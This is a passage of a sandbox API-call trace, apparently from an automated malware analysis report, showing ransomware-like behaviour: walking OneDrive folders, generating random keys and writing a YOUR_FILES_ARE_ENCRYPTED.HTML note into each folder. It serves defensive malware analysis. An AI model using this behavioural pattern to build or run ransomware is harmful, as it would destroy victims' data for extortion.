hTemplateFile=0x0) returned 0x5b8 [0161.933] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.936] CloseHandle (hObject=0x5b8) returned 1 [0161.936] GetProcessHeap () returned 0x270000 [0161.937] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.937] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa44380b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44380b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44380b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x827d0, dwReserved0=0x0, dwReserved1=0x60, cFileName="msvcp110.dll", cAlternateFileName="")) returned 1 [0161.937] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\msvcp110.dll") returned 84 [0161.937] lstrcmpW (lpString1="msvcp110.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.937] PathFindExtensionW (pszPath="msvcp110.dll") returned=".dll" [0161.938] lstrlenW (lpString=".dll") returned 4 [0161.938] PathFindExtensionW (pszPath="msvcp110.dll") returned=".dll" [0161.938] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0161.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\msvcp110.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\msvcp110.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, 
hTemplateFile=0x0) returned 0xffffffff [0161.938] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa451c8f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa451c8f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa451c8f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xd29c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="msvcr110.dll", cAlternateFileName="")) returned 1 [0161.938] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\msvcr110.dll") returned 84 [0161.938] lstrcmpW (lpString1="msvcr110.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.938] PathFindExtensionW (pszPath="msvcr110.dll") returned=".dll" [0161.938] lstrlenW (lpString=".dll") returned 4 [0161.938] PathFindExtensionW (pszPath="msvcr110.dll") returned=".dll" [0161.938] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0161.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\msvcr110.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\msvcr110.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0161.938] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6a4e0b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c3d290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c3d290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="mt-mt", cAlternateFileName="")) returned 1 [0161.939] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt") returned 77 [0161.939] GetProcessHeap () returned 0x270000 [0161.939] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.939] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt" [0161.939] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\*" [0161.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6a4e0b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c3d290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c3d290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.939] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6a4e0b0, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xa6c3d290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c3d290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.939] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c3d290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c3d290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6caf6b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.939] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.939] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.939] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.939] lstrlenW (lpString=".mui") returned 4 [0161.939] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.939] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c3d290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c3d290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6caf6b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) 
returned 0 [0161.940] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.940] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\mt-mt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.941] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.943] CloseHandle (hObject=0x5b8) returned 1 [0161.944] GetProcessHeap () returned 0x270000 [0161.945] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.945] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6caf6b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e9e890, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e9e890, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="nb-no", cAlternateFileName="")) returned 1 [0161.945] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no") returned 77 [0161.945] GetProcessHeap () returned 0x270000 [0161.945] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.945] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no" [0161.945] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\*" [0161.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6caf6b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e9e890, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e9e890, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.946] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6caf6b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e9e890, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e9e890, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.946] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6e9e890, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e9e890, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e9e890, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.946] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.946] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.946] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.946] lstrlenW (lpString=".mui") returned 4 [0161.946] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.946] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6e9e890, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e9e890, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e9e890, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.946] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.946] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.946] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\nb-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.947] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.949] CloseHandle (hObject=0x5b8) returned 1 [0161.968] GetProcessHeap () returned 0x270000 [0161.970] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.970] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e9e890, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa741fb70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa741fb70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ne-np", cAlternateFileName="")) returned 1 [0161.970] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np") returned 77 [0161.970] GetProcessHeap () returned 0x270000 [0161.970] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.970] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np" [0161.970] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\*" [0161.970] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e9e890, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa741fb70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa741fb70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.971] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e9e890, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa741fb70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa741fb70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.971] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa741fb70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa741fb70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa741fb70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, 
dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.971] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.971] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.971] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.971] lstrlenW (lpString=".mui") returned 4 [0161.971] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.971] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa741fb70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa741fb70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa741fb70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.971] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.971] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ne-np\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.972] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.975] CloseHandle (hObject=0x5b8) returned 1 [0161.976] GetProcessHeap () returned 0x270000 [0161.978] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.978] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa741fb70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7681170, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7681170, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="nl", cAlternateFileName="")) returned 1 [0161.978] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl") returned 74 [0161.978] GetProcessHeap () returned 0x270000 [0161.978] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.978] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl" [0161.978] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\*" [0161.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa741fb70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7681170, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7681170, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.979] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa741fb70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7681170, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7681170, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.979] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7681170, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7681170, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7681170, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.979] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\FileSync.LocalizedResources.dll.mui") returned 110 
